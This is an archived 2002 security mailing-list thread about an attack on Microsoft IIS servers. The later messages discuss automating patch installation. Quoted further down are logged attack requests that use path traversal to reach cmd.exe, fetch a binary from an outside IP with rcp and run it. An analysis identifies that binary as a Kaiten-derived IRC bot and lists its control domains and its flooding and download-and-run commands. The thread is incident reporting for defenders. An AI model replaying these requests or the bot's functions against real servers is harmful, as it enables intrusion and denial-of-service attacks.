OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: John Campbell (jcampbell_at_wsipc.org)
Date: Tue Sep 24 2002 - 16:41:28 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    I actually prefer the opportunity to pick and choose. Not all hotfixes
    are necessary for a given installation, and historically at least, they
    aren't regression-tested as fully as services packs, (which aren't
    always perfect when they hit the street either.)

    If you do a lot of servers, it may make sense to set one up manually,
    test it thoroughly, then clone it with a disk imaging tool.

    -----Original Message-----
    From: zeno [mailto:bugtraqcgisecurity.net]
    Sent: Tuesday, September 24, 2002 2:08 PM
    To: John Campbell
    Cc: incidentssecurityfocus.com
    Subject: Re: new IIS worm? (rcp lsass.exe)

    >
    > Windows Update from you-know-who actually does what you describe. I'd

    > always been leery of it, but tried it out recently when setting up a
    > W2K test server, and it performed as advertised. It did take several
    > iterations to get everything updated, owing to various dependencies.

    When I used windows update it downloaded the patches but didn't install
    them. I had to manually go through each one. While this isn't a big deal
    I am looking for something 100 percent automated with install of the
    patches. Perhaps I'm missing something I deal mostly with unix.

    - zeno

    >
    > Regards,
    >
    > John Campbell, CISSP, GCWN
    > Information Security Engineer
    > Washington School Information Processing Cooperative
    > (WSIPC)
    > Everett, Washington, USA
    >
    > -----Original Message-----
    > From: zeno [mailto:bugtraqcgisecurity.net]
    > Sent: Tuesday, September 24, 2002 11:29 AM
    > To: Mark Challender
    > Cc: 'pjesec.dk'; incidentssecurityfocus.com
    > Subject: Re: new IIS worm? (rcp lsass.exe)
    >
    >
    > >
    > > Hardening of IIS with the tools available at Microsoft and using
    > > URLSCAN with the EXE blocking on will stop these attacks.
    > >
    > > Patch, patch, patch, recheck the patches and use URLSCAN!
    >
    > Does anyone know of a gui windows tool that scans your system and
    > provides you with a list of needed patches, and then allows you to
    > select, and have it autodownload and install them? I can't seem to
    > find one (needed mostly for iis).
    >
    > - zenocgisecurity.com
    >
    >
    >
    > >
    > > Mark Challender
    > > Network Administrator
    > >
    > > ==================
    > > Veni, Vidi, Geeki
    > > ==================
    > >
    > >
    > > -----Original Message-----
    > > From: pjesec.dk [mailto:pjesec.dk]
    > > Sent: Monday, September 23, 2002 3:27 AM
    > > To: incidentssecurityfocus.com
    > > Subject: Re: new IIS worm? (rcp lsass.exe)
    > >
    > >
    > >
    > > Christian Mock:
    > >
    > > >Then it seems to go after the web servers, sending the following:
    > >
    > > >GET
    > > /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:ls
    > > as
    > > s.exe+
    > > .
    > > HTTP/1.0..
    > >
    > > >and
    > >
    > > >GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0
    > >
    > > >I've been able to get hold of that lsass.exe binary (9728 bytes),
    > > >but
    >
    > > >I lack the skills to analyze it; I'll happily mail it to anybody
    > > >who
    > > >asks.
    > >
    > >
    > > We have seen this attack from 4 different sources since Sept. 16,
    > > and
    > > have informed the owner of 64.21.95.7 and downloaded the lsass.exe
    for
    >
    > > investigation.
    > >
    > > Based on the attack rate this is most likely a scripted or manual
    > > attack, not a worm.
    > >
    > > Judging from the embedded string in this compressed binary it
    > > appears to be an IRC bot based on the kaiten.c code written by
    > > contemefnet, the author of the Slapper worm :
    > >
    > > Kaiten Win32 API version 2002 by contemefnet
    > >
    > > The binary contains these domainnames, most likeky IRC servers used
    > > for controlling the bot:
    > >
    > > telsa5.mine.nu (Korea)
    > > irc.logicfive.net (Taiwan)
    > > moncredo.shacknet.nu (USA)
    > > telsacredo.shacknet.nu (USA)
    > > lar.ath.cx (Taiwan)
    > >
    > > The program accepts commands to make various DOS attacks or download
    > > new version or executables with http:
    > >
    > > NOTICE %s :PUSH <target> <port> <secs> = A push flooder
    > > NOTICE %s :TCP <target> <port> <secs> = A syn flooder
    > > NOTICE %s :UDP <target> <port> <secs> = A udp flooder
    > > NOTICE %s :MCON <target> <port> <times> = A connectbomb flooder
    > > NOTICE %s :NICK <nick> = Changes the nick of the
    > client
    > > NOTICE %s :DISABLE <pass> = Disables all packeting
    from
    > this
    > > client
    > > NOTICE %s :ENABLE <pass> = Enables all packeting
    from
    > this
    > > client
    > > NOTICE %s :UPDATE <http address> = Downloads a file off the
    > web and
    > > updates the client
    > > NOTICE %s :RUN <http address> = Downloads a file off the
    > web and
    > > runs it
    > > NOTICE %s :GET <http address> = Downloads a file off the
    > web
    > > NOTICE %s :ADDSERVER <server> = Adds a server to the list
    > > NOTICE %s :DELSERVER <server> = Deletes a server from the
    > list
    > > NOTICE %s :LISTSERVERS = Lists server on the list
    > > NOTICE %s :KILL = Kills the client
    > > NOTICE %s :VERSION = Requests version of
    client
    > > NOTICE %s :HELP = Displays this
    > >
    > >
    > > There seems also to be a default account and password in the german
    > > language included in this specific version of Kaiten.
    > >
    > > The IIS attack that tries to inject this Trojan usually has another
    > > URL with "CONNECT chat.vtm.be:6667". This is an attempt to proxy an

    > > connection to port 6667(IRC) on chat.vtm.be.
    > >
    > >
    > >
    > > Peter Jelver
    > > ...
    > >
    > > eSec A/S
    > >
    > > http://www.esec.dk
    > >
    ......................................................................
    > > ......
    > > .
    > >
    > > PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F E687 BB8A 128F D85C A7D7
    > >
    > >
    > >
    > >
    > >
    > > --------------------------------------------------------------------
    > > --
    > > ------
    > > This list is provided by the SecurityFocus ARIS analyzer service.
    > > For more information on this free incident handling, management
    > > and tracking system please see: http://aris.securityfocus.com
    > >
    > > --------------------------------------------------------------------
    > > --
    > > ------
    > > This list is provided by the SecurityFocus ARIS analyzer service.
    > > For more information on this free incident handling, management
    > > and tracking system please see: http://aris.securityfocus.com
    > >
    > >
    >
    >
    > ----------------------------------------------------------------------
    > --
    > ----
    > This list is provided by the SecurityFocus ARIS analyzer service. For
    > more information on this free incident handling, management
    > and tracking system please see: http://aris.securityfocus.com
    >
    >

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com